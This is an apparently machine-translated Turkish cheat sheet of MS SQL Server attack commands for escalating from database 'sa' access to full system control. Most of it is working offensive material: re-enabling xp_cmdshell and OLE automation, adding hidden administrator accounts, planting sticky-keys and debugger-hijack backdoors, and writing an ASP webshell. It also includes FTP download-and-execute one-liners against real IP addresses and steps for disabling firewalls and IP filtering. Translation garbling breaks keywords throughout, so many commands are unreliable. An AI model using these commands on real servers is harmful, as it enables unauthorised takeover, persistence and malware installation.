1433 Onarım Emirleri
net kullanıcı SQLDebugger list /add net localgroup administrators SQLDebugger /add
Hata Mesajı: Saklanan prosedür 'master.. xp_cmdshell'。
Onarım yöntemi: çok genel, aslında diğer 126 127 birlikte tamir edilebilir,
Ama xplog70.dll diğer her şey bu komutla düzeltilebilir
xp_cmdshell yeni kurtarma yöntemleri Adım 1: Sil: Drop prosedürü sp_addextendedproc Bırakma prosedürü sp_oacreate yönetici sp_dropextendedproc 'xp_cmdshell' Sunucu: Msg 3701, Seviye 11, Durum 5, Hat 1 'sp_addextendedproc' sürecini sistem dizininde bulunmadığı için kaldırmak mümkün değildir. Sunucu: Mesaj 3701, Seviye 11, Durum 5, Prosedür sp_dropextendedproc, Hat 18 'xp_cmdshell' sürecini sistem dizininde bulunmadığı için kaldırmak mümkün değildir. Adım 2 İyileşme: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") Doğrudan iyileşme, sp_addextendedproc var olup olmamasına bakılmaksızın
xplog70.dll düzeltmeler:
Hata Mesajı: DLL xplog70.dll veya DLL'nin referans ettiği DLL'lerden biri monte edilemedi. Sebep: 126 (Belirtilen modül bulunamıyor.) )。
XPLOG70.DLL düzeltin (önce dosyayla birlikte \x86\bin yedekleme dizinini kontrol edin, sonra aşağıdaki dizini değiştirin)
Adım 1 yönetici sp_dropextendedproc 'xp_cmdshell' Adım 2 DBCC addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Saklanan prosedür 'master.. xp_cmdshell'。 Adım 1: Prosedür oluşturma sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (sahibi.) Çağrılacak fonksiyonun adı
*/ @dllname varchar(255)/* fonksiyon içeren DLL'nin adı */ olarak implicit_transactions başlat eğer @@trancount > 0 Başlamak raiserror(15002,-1,-1,'sp_addextendedproc') Dönüş (1) Son dbcc addextendedproc( @functname, @dllname) Dönüş (0) -- sp_addextendedproc GIT
Adım 2: EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'dedecare @o int
SQL Server, bileşen 'xp_cmdshell' bileşeninin 'sys.xp_cmdshell' sürecine erişimi engelledi çünkü bu bileşen bu sunucunun güvenlik yapılandırmasının bir parçası olarak kapatılmıştı. Sistem yöneticileri sp_configure kullanarak 'xp_cmdshell'yi etkinleştirebilir. xp_cmdshell etkinleştirme hakkında daha fazla bilgi için SQL Server Online Books serisindeki Peripheral App Configurator'a bakınız.
; EXEC sp_configure 'gelişmiş seçenekleri göster', 1 -- ; GEÇERSIZ KALDIRMA ILE YENIDEN YAPILANDIRMAK -- ; YÖNETICI sp_configure 'xp_cmdshell', 1 -- ; GEÇERSIZ KALDIRMA ILE YENIDEN YAPILANDIRMAK -- ; EXECUTIVE sp_configure 'gelişmiş seçenekleri göster', 0 --
SQL tehlikeli depolamayı kaldırın: BIRAKMA PROSEDÜRÜ sp_makewebtask Yönetici Üsta.. sp_dropextendedproc xp_cmdshell Yönetici Üsta.. sp_dropextendedproc xp_dirtree Yönetici Üsta.. sp_dropextendedproc xp_fileexist Yönetici Üsta.. sp_dropextendedproc xp_terminate_process Yönetici Üsta.. sp_dropextendedproc sp_oamethod Yönetici Üsta.. sp_dropextendedproc sp_oacreate Yönetici Üsta.. sp_dropextendedproc xp_regaddmultistring Yönetici Üsta.. sp_dropextendedproc xp_regdeletekey Yönetici Üsta.. sp_dropextendedproc xp_regdeletevalue Yönetici Üsta.. sp_dropextendedproc xp_regenumkeys Yönetici Üsta.. sp_dropextendedproc xp_regenumvalues Yönetici Üsta.. sp_dropextendedproc sp_add_job Yönetici Üsta.. sp_dropextendedproc sp_addtask Yönetici Üsta.. sp_dropextendedproc xp_regread Yönetici Üsta.. sp_dropextendedproc xp_regwrite Yönetici Üsta.. sp_dropextendedproc xp_readwebtask Yönetici Üsta.. sp_dropextendedproc xp_makewebtask Yönetici Üsta.. sp_dropextendedproc xp_regremovemultistring Yönetici Üsta.. sp_dropextendedproc sp_OACreate DROP PROSEDÜRÜ sp_addextendedproc
Genişletilmiş depolanmış prosedürleri geri getir Önce sp_addextendedproc geri getirin, ifade şöyledir: Birincisi: Prosedür oluşturma sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (sahibi.) Çağrılacak fonksiyonun adı */ @dllname varchar(255)/* fonksiyon içeren DLL'nin adı */ olarak implicit_transactions başlat eğer @@trancount > 0 Başlamak raiserror(15002,-1,-1,'sp_addextendedproc') Dönüş (1) Son dbcc addextendedproc( @functname, @dllname) Dönüş (0) -- sp_addextendedproc GIT
İkincisi: Usta kullan exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' exec sp_addextendedproc xp_dirtree,'xpstar.dll' exec sp_addextendedproc xp_enumgroups,'xplog70.dll' exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' exec sp_addextendedproc xp_loginconfig,'xplog70.dll' exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' exec sp_addextendedproc sp_OACreate, 'odsole70.dll' exec sp_addextendedproc sp_OADestroy,'odsole70.dll' yönetici sp_addextendedproc sp_OAGetErrorInfo, 'odsole70.dll' exec sp_addextendedproc sp_OAGetProperty, 'odsole70.dll' exec sp_addextendedproc sp_OAMethod,'odsole70.dll' Exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' Exec sp_addextendedproc sp_OAStop,'odsole70.dll' exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' Exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' exec sp_addextendedproc xp_regread,'xpstar.dll' exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' exec sp_addextendedproc xp_regwrite,'xpstar.dll' exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
Saklanan prosedürü genişleten ifadeyi silin xp_cmdshell: yönetici sp_dropextendedproc 'xp_cmdshell'
cmdshell'in sql ifadesini geri alın exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
cmdshell SQL ifadesini aç exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Depolama genişlemesinin var olup olmadığını belirleyin Master.dbo.sysobjects'ten count(*) seçin, burada xtype='x' ve name='xp_cmdshell' Geri dönüş sonucu 1 ve sorun yok
Restore xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Master.dbo.sysobjects'ten count(*) seçin, burada xtype='x' ve name='xp_cmdshell' Geri dönüş sonucu 1 ve sorun yok Aksi takdirde, xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
cmdshell'in sql ifadesini engelle sp_dropextendedproc "xp_cmdshell
Bir. SA Şifre Yöntemini Değiştirmek: SQL Kapsamlı Kullanım Aracı ile bağlantı kurduktan sonra şu komutu çalıştırın: exec sp_password NULL, 'yeni şifre', 'sa' (İpucu: dikkatli kullanın!)
İki. Zayıf şifreyi yamalayın.
Yöntem 1: Bağlantı kurduktan sonra splitter'ı sorgulayın: varsa (* seç dbo.sysobjects burada id = object_id(N'[dbo].[ xp_cmdshell]') ve OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
yönetici sp_dropextendedproc N'[dbo]. [xp_cmdshell]'
GIT Sonra komutu çalıştırmak için F5 tuşuna basın
Yöntem 2: Splitter bağlandıktan sonra sorgu İlk adım uygulamaktır: master kullanın Adım 2: sp_dropextendedproc 'xp_cmdshell' Sonra komutu çalıştırmak için F5 tuşuna basın
DLL xpsql70.dll veya DLL'nin referans ettiği DLL'lerden biri monte edilemez. Neden 126 (Belirtilen modül bulunamıyor. ) Kurtarma yöntemi: Splitter bağlantısını sorguladıktan sonra, Adım 1: "xp_cmdshell" sp_dropextendedproc Adım 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Fonksiyon xp_cmdshell kütüphanede bulunamaz xpweb70.dll. Sebep: 127 (Belirtilen program bulunamıyor.) ) Kurtarma yöntemi: Splitter bağlantısını sorguladıktan sonra, Adım 1 Uygulama: yönetici sp_dropextendedproc 'xp_cmdshell' Adım 2: 'xp_cmdshell', 'xpweb70.dll' sp_addextendedproc yönetici Sonra komutu çalıştırmak için F5 tuşuna basın
Yukarıdaki yöntemlerden hiçbiri geri alınamazsa, lütfen hesabı doğrudan aşağıdaki yöntemlerle eklemeyi deneyin: Splitter bağlantısını sorguladıktan sonra, 2000servser sistemi: deprove @shell int exec sp_oacreate 'wscrip remove t.shell'@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP veya 2003Server Sistemi: 126 Hatası! Emir
@shell int exec sp_oacreate 'wscrip t.shell'i kaldır' ilan et, @shell çıktı exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\ SQL Server, bileşen 'xp_cmdshell' bileşeninin 'sys.xp_cmdshell' sürecine erişimi engelledi çünkü bu bileşen bu sunucunun güvenlik yapılandırmasının bir parçası olarak kapatılmıştı. Sistem yöneticileri sp_configure kullanarak 'xp_cmdshell'yi etkinleştirebilir. xp_cmdshell etkinleştirme hakkında daha fazla bilgi için SQL Server Online Books serisindeki Peripheral App Configurator'a bakınız.
Analizör tarafından yürütülen ifadeler:
EXECUTIVE sp_configure 'gelişmiş seçenekleri göster', 1; YENIDEN KONFIGÜRASYON; YÖNETICI sp_configure 'xp_cmdshell', 1; YENIDEN KONFIGÜRASYON;
Bazen, yukarıdaki ifadeler sorgu ayıran bağlantıyla çalıştırılırken, saklanan prosedür sp_addextendedproc
Çözüm:
Prosedür oluşturma sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (sahibi.) Çağrılacak fonksiyonun adı */ @dllname varchar(255)/* fonksiyon içeren DLL'nin adı */ olarak implicit_transactions başlat eğer @@trancount > 0 Başlamak raiserror(15002,-1,-1,'sp_addextendedproc') Dönüş (1) Son dbcc addextendedproc( @functname, @dllname) Dönüş (0) -- sp_addextendedproc GIT Bu kod sorgu bölücüye yapıştırılır ve çalıştırılır
Kaşif:
c:\windows\explorer.exe
İçindekileri görüntüleyin yönetici master.dbo.xp_subdirs 'c:\' Liste diskleri Yönetici Üsta.. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Sürüm 5.00 >3389.reg Yankı. >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg echo "Etkin"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg Echo [HKEY_USERS\. DEFAULT\Klavye Düzeni\Anahtar] >>3389.reg echo "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg Regedit /s 3389.reg
Open 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
3389 Geçişi:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
3389 portuna göz atın
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Normal CMD arka kapı xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K doğrudan PS Mar'a gidiyor Yönetici Üsta.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 OpenRowSet('Microsoft.jet.OLEDB.4.0',' içinden * seçin; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP doğrudan PS atlarında Yönetici Üsta.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 OpenRowSet('Microsoft.jet.OLEDB.4.0',' içinden * seçin; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Arka kapı komutunu değiştirin @o int bildirmek exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
@o int bildirmek exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
c:\windows\explorer.exe c:\windows\system32\sethc.exe kopyala: c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@o int bildirmek Yönetici sp_oacreate 'wscrip T.Shell'i kaldır', @o exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX çalıştırmak istediğiniz komuttur
Kayıt defterinde belirtilen anahtarda belirtilen değeri yaz), yöntemi kullanarak (HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue anahtarına bbb yaz):
EXECUTIVE master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\AAA',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Öncelikle, ftp.exe wmpub dizinine kopyalayın @echo CD c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Open 3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL bir cümle yazar exec master.dbo.xp_subdirs 'd:\web\cdlxkj'; exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA Sandbox Modu Tanıtımı ----- ---------------------- Yönetici Üsta.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; ------------------------------------------------------- Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")'); ------------------------------------------------------- Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 VARDIYASI
Kullanılan cümle şöyleydi: İstila EXECUTIVE master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', @value_name='Hata Ayıklayıcı', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe'
İyileşme EXECUTIVE master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', @value_name='Hata Ayıklayıcı', @type='REG_SZ', @value=''
Görüntü kaçırma
EXECUTIVE master.. xp_regwrite --- bu kayıt defterini düzenlemek! @rootkey='HKEY_LOCAL_MACHINE', ---İşte pozisyon! @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', -----Burası da pozisyon! @value_name='Hata ayıklayıcı', --- bu tablonun adı! @type='REG_SZ', --- işte yazmanın anlamı! @value='C:\WINDOWS\explorer.exe' ---- işte yazılı içerik!
Tüm süreç master kullanmaktır: xp_regwrite bu bileşen tamamlanırsa,
1.sql kayıt tutucu anahtarının ele geçirilip ele geçirilmediğini sorgulamak için bir komut
Yönetici Üsta.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql komut, kayıt tutucu tuşunu ele geçirip yerine görev yöneticisi koyar (tabii ki istediğiniz başka komutlarla değiştirebilirsiniz)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql kayıt kaydı anahtarının kaçırma özelliğini kaldırma komutu, sunucunuzun başkaları tarafından istismar edilmesini korur
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL Write Files
declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set=GetObject(os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
NET yükseltmesi olmayan betikler
struser=wscrip ile t.arguments(0) kaldırıldı strpass=wscrip ile t.arguments(1) kaldırılır
set lp=createObject("Wscrip remove t.NETWORK") oz="WinNT://"&lp. ComputerName Set ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Set od=ob.create("user",struser) OD. SetPassword strpass OD. SetInfo Set=GetObject(oz&"/" & struser & ",user") Oe. Add(of. ADsPath)
Her yönetici için OE. Üyeler if struser=admin. O zaman isim Wscrip t.echo struser ve "Başarılı Kuruldu!" yazısını kaldırdı. wscrip t.quit'i kaldırmak için biter if Sıradaki
Wscrip t.echo struser kaldır & "Kullanıcı kurulumu başarısız oldu!" Yukarıdakileri kullanıcı olarak kaydedin. VBS dosyası Sonra çalıştır: cscrip ile user.vbs kullanıcı adı şifresini kaldır
JET sandbox modu kullanarak, XP_cmdshell ve ilgili dinamik bağlantı kütüphaneleri gibi depolanmış prosedürlerin neden olduğu sorunları çözebilirsiniz. Güvenlik nedenleriyle, sistem varsayılan olarak sandbox modunu açmaz; bu da xp_regwrite sandbox modunu açmasını gerektirir:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0 \Motorlar','SandBoxMode','REG_DWORD',1
Daha sonra sisteme 1234 şifreli kullanıcı adında bir test eklemek için sandbox komutunu çalıştırın:
OpenRowSet('Microsoft.jet.OLEDB.4.0',' içinden * seçin; database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
OpenRowSet('Microsoft.jet.OLEDB.4.0',' içinden * seçin; database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup yöneticiler test /add")')
Farklı işletim sistemlerinin farklı yolları vardır ve duruma göre değiştirilmelidir:
NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\
Ayrıca, Microsoft SQL Server 2005'te bazı depolanmış prosedürler varsayılan olarak kapalıdır ve açılması için komutlar gereklidir:
XP_cmdshell açın:
EXECUTIVE sp_configure 'gelişmiş seçenekleri göster', 1; YENIDEN KONFIGÜRASYON; YÖNETICI sp_configure 'xp_cmdshell', 1; YENIDEN KONFIGÜRASYON;
'OPENROWSET'i aç:
exec sp_configure 'gelişmiş seçenekleri göster', 1; YENIDEN KONFIGÜRASYON; yönetici sp_configure 'Ad Hoc Dağıtılmış Sorgular',1; YENIDEN KONFIGÜRASYON;
'sp_oacreate'i açın:
exec sp_configure 'gelişmiş seçenekleri göster', 1; YENIDEN KONFIGÜRASYON; yönetici sp_configure 'Eski Otomasyon Prosedürleri',1; YENIDEN KONFIGÜRASYON;
İşte sa altında yürütme komutunun yanlış olduğu birkaç durum: 1. DLL xpsql70.dll veya DLL tarafından referans edilen bir DLL yüklenemez. Neden 126 (Belirtilen modül bulunamıyor. ) Bu durum oldukça yaygındır ve onarım basit ve basit, ancak bazı koşullar vardır. Bu durumda dizini listeleyebiliyorsanız (sqltools v2.0'da bir dizin fonksiyonu var) Bu %80 durumu için tebrikler, dizini listeleyebiliyorsanız, sadece xplog70.dll yolunu bulup aşağıdaki komutu çalıştırın. Adım 1 exec sp_dropextendedproc 'xp_cmdshell' (bu komut, orijinal cmdshell'i silmek içindir, çünkü zaten bozulmuş) Adım 2 dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll") ; EXECUTIVE sp_configure 'gelişmiş seçenekleri göster', 0 – Tabii ki bu bir sql komutu ve sorgu analizörüyle çalıştırılıyor. İkinci adımdaki c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll xplog70.dll yoludur, bu yol oldukça yaygındır, eğer c sürücüsünde yoksa, başka sürücü harfleri bulabilirsiniz. 2. Kütüphanede xp_cmdshell fonksiyonu bulamıyor xpweb70.dll. Sebep: 127 (Belirtilen program bulunamıyor.) ) Aslında, bu yukarıdaki 126 ile aynı, yani cmdshell yanlış, yeter ki yedek bulup yukarıdaki yöntemi takip etsen xplog70.dll düzeltmek istiyorsan. 3. Saklanan prosedür 'master' bulunamadı. xpcmdshell' Bu durumda, internette yöntemin şöyle olduğunu görüyorum: Adım 1: Sil: Drop prosedürü sp_addextendedproc Bırakma prosedürü sp_oacreate yönetici sp_dropextendedproc 'xp_cmdshell' Adım 2 İyileşme: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") Aslında, bu yukarıdakiyle aynı, aslında dikkatli olursanız, yukarıdaki 126 127 yalnızca 'master:' adlı depolanmış prosedürü bulamayacaktır. xpcmdshell' olarak kullanılır' çünkü ilk adım cmdshell'in depolanmış prosedürünü silmektir. Bu durumda, yukarıdaki ikinci adımı takip edin. 4. Hata Mesajı: SQL Server, bu bileşenin güvenlik yapılandırmasının bir parçası olarak kapatılması nedeniyle bileşenin 'xp_cmdshell' sys.xp_cmdshell sürecine erişimi engelledi. Sistem yöneticileri sp_configure kullanarak 'xp_cmdshell'yi etkinleştirebilir. xp_cmdshell etkinleştirme hakkında daha fazla bilgi için SQL Server Online Books serisindeki Peripheral App Configurator'a bakınız. Bu durum en basit olanıdır, çünkü hiçbir şey düşünmenize gerek yok, sadece aşağıdaki komutu yürütmelisiniz ; EXEC sp_configure 'gelişmiş seçenekleri göster', 1 -- ; GEÇERSIZ KALDIRMA ILE YENIDEN YAPILANDIRMAK -- ; YÖNETICI sp_configure 'xp_cmdshell', 1 -- ; GEÇERSIZ KALDIRMA ILE YENIDEN YAPILANDIRMAK -- ; EXECUTIVE sp_configure 'gelişmiş seçenekleri göster', 0 –
Yukarıdaki düzeltmeden sonra cmd komutunu çalıştırabilirsiniz ve gücünüzü artırmaya başlarsınız. Genellikle önce ip'yi kontrol ederim, intranet olup olmadığını kontrol ederim, sonra REG sorgusu HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Sunucu\WinStations\RDP-Tcp /v PortNumber üzerinden terminal portunu kontrol ederim, ardından netstat –an üzerinden terminalin açık olup olmadığını kontrol ederim ve ardından net kullanıcı şifresini / Bir kullanıcı ekleyin ve ardından net localgroup yöneticileri kullanıcı /add Her şey yolunda giderse, bu bir sunucuyu devre dışı bırakır. Ama süreçte birçok sorun var. 1. Net güç tanıtımı başarılı olsa da terminale bağlanamaz. Aşağıdaki durumlar vardır (1) Sunucu intranette yer alır. (2) TCP/IP taraması. Önce aşağıdaki cmd komutunu çalıştırın: cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, TCP/IP filtreleme için kayıt defterinin ilk bölümünü dışa aktar cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, TCP/IP filtreleme için kaydın ikinci bölümünü dışa aktarın cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", TCP/IP filtreleme ile ilgili kayıt listesindeki üçüncü yeri dışa aktarıyor Sonra c sürücüsüne geri dönün 1.reg, 2.reg, 3.reg, 1.reg, 2.reg 3.reg sabit diskinize geri dönüp düzenleme yapın, EnableSecurityFilters alanını bulup dword'dan sonraki anahtar değerin 0000000000 olup olmadığını kontrol edin, eğer 00000001 ise, bu yöneticinin tcp/ip filtreleme yaptığını gösterir, sadece 1'i 0'a, 2'ye değiştirmemiz yeterli. Reg ve 3.reg de aynı değişiklikleri yapıyor. (3) Bir IP güvenlik politikası oluşturun. IPSEC Hizmetleri hizmetini durdurmak için cmd /c net stop policyagent komutunu çalıştırın. Terminali tekrar bağlayın. (4) Yönetici tarafından belirlenen terminalin giriş izni yalnızca belirtilen kullanıcı tarafından kullanılabilir. (5) Güvenlik duvarı. Cmd komutunu çalıştırın: net stop alg /ynet stop sharedaccess
2. NET yükseltmesi ortaya çıkar ve erişim reddedilir Net1 kullanıcı kullanıcı şifresini /add deneyebilirsiniz Eğer net1 de erişimi reddediyorsa, shfit backdoor kopyalayıp cmd komutunu çalıştırmayı deneyebilirsiniz: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe kopyala: c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe Eğer istenirse, başarılı olan 1 dosyayı kopyalayın. Terminale bağlanın ve 5 shift tuşuna basın, ne açıldığını görün. Kaka Explorer ile oynayın, şimdi sadece elle kullanıcı ekleyin. 3. Net tırmanma erişim reddetme hatası ile gerçekleşir 5 (özet) Bu durumda net1'i denemenize gerek yok, copy shift backdoor'u deneyebilirsiniz, kopyalama 0 dosyasını kopyalamanızı isterse başarılı olmadığını kanıtlar. Sonra yüklemeyi deneyebilirsiniz, eğer yükleyebiliyorsan, doğrudan bir süre önce çıkan net olmayan bir güç yükseltme aracını gönderebilir ve ardından bir kullanıcı ekleyebilirsiniz. Ama bu vakaların çoğu yüklenemiyor, bu yüzden düşünmeniz gerekiyor. cmd çalıştırılabildiği için, dosya ftp altında cmd üzerinden indirilebilir, ancak ftp'nin temel amacı metin yazabilmek veya toplu işlem yapabilmektir. Sonra bir SQL ifadesi aracılığıyla bir metin veya toplu yazı yazabilirsiniz. declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP' exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp hesabı' exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp şifresi' exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (net yükseltme betiği yok) c:\en.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'hoşça kal' Sorgu analizörü başarıyla 